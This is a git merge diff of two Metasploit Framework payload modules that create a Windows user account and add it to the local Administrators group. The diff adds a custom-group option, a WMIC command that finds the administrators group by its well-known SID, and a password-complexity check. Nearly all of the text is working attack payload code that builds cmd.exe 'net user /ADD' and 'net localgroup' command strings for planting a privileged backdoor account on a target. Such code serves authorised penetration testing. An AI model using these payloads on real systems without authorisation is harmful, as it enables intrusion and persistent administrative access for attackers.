Merge branch 'adduser_tabs' of https://github.com/ChrisJohnRiley/metasploit-framework into ChrisJohnRiley-adduser_tabs

modules/payloads/singles/cmd/windows/adduser.rb

@@ -21,7 +21,7 @@ module Metasploit3
 			'Name'        => 'Windows Execute net user /ADD CMD',
 			'Version'     => '$Revision$',
 			'Description' => 'Create a new user and add them to local administration group',
-			'Author'      => ['hdm','scriptjunkie'],
+			'Author'      => ['hdm','scriptjunkie','Chris John Riley'],
 			'License'     => MSF_LICENSE,
 			'Platform'    => 'win',
 			'Arch'        => ARCH_CMD,
@@ -39,7 +39,15 @@ module Metasploit3
 			[
 				OptString.new('USER', [ true, "The username to create",     "metasploit" ]),
 				OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
+				OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
+				OptBool.new('WMIC',	[ true, "Use WMIC on the target to resolve administrators group", false ]),
 			], self.class)
+
+		register_advanced_options(
+			[
+				OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
+			], self.class)
+
 	end
 
 	def generate
@@ -49,12 +57,35 @@ module Metasploit3
 	def command_string
 		user = datastore['USER'] || 'metasploit'
 		pass = datastore['PASS'] || ''
+		cust = datastore['CUSTOM'] || ''
+		wmic = datastore['WMIC']
+		complexity = datastore['COMPLEXITY']
 
 		if(pass.length > 14)
 			raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
 		end
 
-		return "cmd.exe /c net user #{user} #{pass} /ADD && " +
-			"net localgroup Administrators #{user} /ADD"
+		if (pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/) and complexity
+			print_good "Password: #{pass} passes complexity checks"
+		elsif complexity
+			print_error "Password: #{pass} doesn't meet complexity requirements and may cause issues"
+		end
+
+		if not cust.empty?
+			print_status("Using custom group name #{cust}")
+			return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+				"net localgroup \"#{cust}\" #{user} /ADD"
+		elsif wmic
+			print_status("Using WMIC to discover the administrative group name")
+			return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" " +
+				"%G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
+				"FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
+				"net user #{user} #{pass} /ADD && " +
+				"net localgroup \"%X\" #{user} /ADD\""
+		else
+			return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+				"net localgroup Administrators #{user} /ADD"
+		end
+
 	end
 end

modules/payloads/singles/windows/adduser.rb

@@ -28,7 +28,7 @@ module Metasploit3
 			'Name'          => 'Windows Execute net user /ADD',
 			'Version'       => '$Revision$',
 			'Description'   => 'Create a new user and add them to local administration group',
-			'Author'        => 'hdm',
+			'Author'        => ['hdm','Chris John Riley'],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'win',
 			'Arch'          => ARCH_X86,
@@ -39,6 +39,13 @@ module Metasploit3
 			[
 				OptString.new('USER', [ true, "The username to create",     "metasploit" ]),
 				OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
+				OptString.new('CUSTOM', [ false, "Custom group name to be used instead of default", '' ]),
+				OptBool.new('WMIC',	 [ true, "Use WMIC on the target to resolve administrators group", false ]),
+			], self.class)
+
+		register_advanced_options(
+			[
+				OptBool.new("COMPLEXITY", [ true, "Check password for complexity rules", true ]),
 			], self.class)
 
 		# Hide the CMD option...this is kinda ugly
@@ -51,13 +58,36 @@ module Metasploit3
 	def command_string
 		user = datastore['USER'] || 'metasploit'
 		pass = datastore['PASS'] || ''
+		cust = datastore['CUSTOM'] || ''
+		wmic = datastore['WMIC']
+		complexity= datastore['COMPLEXITY']
 
 		if(pass.length > 14)
 			raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
 		end
 
-		return "cmd.exe /c net user #{user} #{pass} /ADD && " +
-			"net localgroup Administrators #{user} /ADD"
-	end
+		if (pass =~ /\A^.*((?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[\d\W])).*$/) and complexity
+			print_good "Password: #{pass} passes complexity checks"
+		elsif complexity
+			print_error "Password: #{pass} doesn't meet complexity requirements and may cause issues"
+		end
 
+		if not cust.empty?
+			print_status("Using custom group name #{cust}")
+			return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+				"net localgroup \"#{cust}\" #{user} /ADD"
+		elsif wmic
+			print_status("Using WMIC to discover the administrative group name")
+			return "cmd.exe /c \"FOR /F \"usebackq tokens=2* skip=1 delims==\" " +
+				"%G IN (`wmic group where sid^='S-1-5-32-544' get name /Value`); do " +
+				"FOR /F \"usebackq tokens=1 delims==\" %X IN (`echo %G`); do " +
+				"net user #{user} #{pass} /ADD && " +
+				"net localgroup \"%X\" #{user} /ADD\""
+		else
+			return "cmd.exe /c net user #{user} #{pass} /ADD && " +
+				"net localgroup Administrators #{user} /ADD"
+		end
+
+	end
 end
+